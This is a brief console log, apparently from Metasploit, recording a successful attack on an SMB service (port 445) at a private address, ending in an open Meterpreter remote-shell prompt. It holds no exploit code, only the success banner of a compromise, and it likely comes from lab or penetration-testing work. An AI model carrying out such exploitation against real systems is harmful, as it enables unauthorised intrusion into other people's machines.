[+] 192.168.20.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
